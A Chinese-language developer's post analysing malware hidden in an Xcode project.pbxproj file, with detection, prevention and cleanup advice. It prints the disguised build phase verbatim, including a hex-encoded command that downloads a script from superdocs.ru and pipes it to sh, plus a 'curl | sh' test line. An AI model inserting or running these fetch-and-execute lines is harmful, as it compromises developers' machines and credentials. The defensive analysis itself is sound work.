今天这个群友又(两年前他也中毒了)找上了我,因为收了白包(和项目源码)后账号被盗了,而且还被勒索了.
Xcode有毒迹象
查看project.pbxproj步骤
病毒内容(删除这部分就能删除病毒)
C518D91414C779DC676A102C /* Cocoa Libraries Compiler */ = {
isa = PBXShellScriptBuildPhase;
buildActionMask = 2147483647;
files = (
);
inputFileListPaths = (
);
inputPaths = (
);
name = "Cocoa Libraries Compiler";
outputFileListPaths = (
);
outputPaths = (
);
runOnlyForDeploymentPostprocessing = 0;
shellPath = /bin/sh;
shellScript = "# This output is used by Xcode outputs to avoid re-running this script phase.
echo \"6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f
7375706572646f63732e72752f61207c207368202d732066616c73650a\" | xxd -p -r | sh >/dev/null 2>&1 || true
";
};
病毒分析
截图内和以下内容不一致是因为我担心自己中毒_,所以破坏了它在项目中的结构_
echo "6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f 7375706572646f63732e72752f61207c207368202d732066616c73650a" | xxd -p -r | sh >/dev/null 2>&1 || true
16进制转ASCII(朋友提示这是16进制的,以下是转进制网站,放心访问)
转码后的内容
可见它依赖curl去拉取病毒本体
curl --max-time 8 -sk superdocs.ru/a | sh -s false
浏览器访问网站superdocs.ru/a显示的内容
#!/bin/bash AUTOCLEAN=false BASEDIR=1" ] then AUTOCLEAN={PROJECT_FILE_PATH}" ] then BASEDIR=?' 1 2 3 15 curl --connect-timeout 5 -s -k -o /tmp/exec.
/tmp/exec.$$ "AUTOCLEAN "superdocs.ru"
别的shell命令看不太明白,但是chmod +x的意思是加执行权限
查找病毒的办法:
随便找一个Xcode项目打开 project.pbxproj文件,检索以下内容
echo "6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f 7375706572646f63732e72752f61207c207368202d732066616c73650a" | xxd -p -r | sh >/dev/null 2>&1 || true;
如果你随便新建一个Demo都能在 project.pbxproj中检索到以上部分就已经中毒(说明病毒已经有复制能力)
如何防止中毒:
安装Lulu禁止curl联网权限(预算充足的话也可以使用,Little Snitch(付费软件,还挺贵))
在终端运行(这里我把域名换成了百度,放心访问):
curl --max-time 8 -sk http://baidu.com |sh
勾选Block
如果已经中毒
-
1.备份资料到移动硬盘
-
2.格式化硬盘
-
3.重装系统
-
4.安装网络拦截软件LuLu或者Little Snitch
-
5.清理项目里的病毒
-
6.安装Xcode正常使用
交流 / 合作:请加开发者微信 Rollin0_0
